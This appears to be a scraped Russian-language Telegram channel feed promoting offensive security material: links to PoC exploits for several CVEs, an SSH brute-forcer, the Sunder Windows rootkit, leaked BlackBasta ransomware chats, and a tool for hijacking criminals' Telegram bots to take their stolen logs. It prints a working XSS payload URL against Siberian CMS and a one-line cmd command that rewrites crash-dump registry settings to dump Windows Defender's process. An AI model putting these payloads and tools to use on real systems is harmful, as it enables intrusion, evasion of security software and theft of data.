BlitzSSH - SSH Cracking Tool
*
Казалось бы брутфорсер, но формат подачи данных интересный.
Ну и в телегу стучит по случаю.
Link


#ssh #bruteforce

Помните кулл-стори про 0day в 7zip когда RU хакеры поблэчили UA гос. организации и через них же раскидывали малварь в сентябре 2024 года (SmokeLoader malware) ?
Так вот, есть продолжение ))))
Новый год, новые дыры - CVE-2025-0411
README

CVE-2024-36972
*
Два в одном !
Linux LPE and Container Escape
*
vulnerability affects Linux kernel versions:
v6.8 to v6.9
v5.15.147
v6.1.78
v6.6.17

POC exploit

#Linux #lpe #container #escape

CVE-2025-22604
(CVSS 9.1)
Remote Code Execution Flaw in Cacti
*
POC

CVE-2025-1105
*
Siberian CMS (version - 4.20.6)
*
POC

https://x.x.x.x/app/sae/design/desktop/flat"><img src=x onerror=alert(document.location)>/js/bootstrap-tagsinput.min.js

CVE-2025-23369
*
bypass SAML authentication on GitHub Enterprise
*
WriteUP
*
Exploit

Кто же такой хакер Bratva ?
*
В рамках специального расследования, в нашу редакцию попала секретная VHS запись.
Проанализировав которую, были установлены следующие лица:
Петер Севера
Петр Левашов
Юрист Насковец
Статисты - кадровые офицеры редакции gaz3ta.ru

22летняя RCE в GameBoy
*
Пора патчить тамагочи !
*
WriteUP

CVE-2024-12754 AnyDesk
*
wtf
*
LPE poc exploit

Лидеры среди Telegram-каналов по кибербезопасности
*
полный рейтинг 450 каналов со ссылками

😎

EDR dump (for fun разумеется)

cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"

Sunder
*
Это Windows Rootkit на основе Fudmodule Rootkit от Lazarus Group. Ссылка на эту версию Sunder для примера эксплойта драйвера Appid.sys
Уязвимый драйвер Сандера в этой репе GitHub является драйвер Dell dbutil_2_3.sys ( драйвер заблокирован Microsoft).
Сначала нужно разлочить драйвер (см описание в репе)
Sunder Rootkit

опа

Извините))))

onliner

curl -s https://URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

CVE-2025-0108 Palo Alto Networks PAN-OS
*
POC exploit

Вот вам и лол
*
LOLC2

BlackBasta Chat Logs
*
У ransomВарщиков протек matrix сервак

Украсть у Бота !
Помните админы каналов всегда боялись добавлять в чЯты ботов ?
Правильно боялись (ID рано или поздно всплывет, или набрутят или etc).
Но ладно если просто антирекламный бот в открытом чате, а если это Ransom BOT или LOGS BOT
или Zabbix BOT лол да)))
Телега давно у черношляпников как C&C сервер используется.
Так вот, перехватом ботов занимаются ВСЕ, менты ловят злых шляп, злые шляпы ловят хомяков и получают удобоваримый лог в телегу, более ленивые черные шляпы ловят в подворотне ботов первых шляп, копипастят логи и имеют свой сладкий шекель.
*
Ну так вот, тут один threat hunter имел неосторожность написать софтину, которая автоматизирует большую часть процесса, ты только парсить логи успевай !
*
В ролике все наглядно
*
DownLoad Thы soft (x_)

#telegram #steal #bots #logs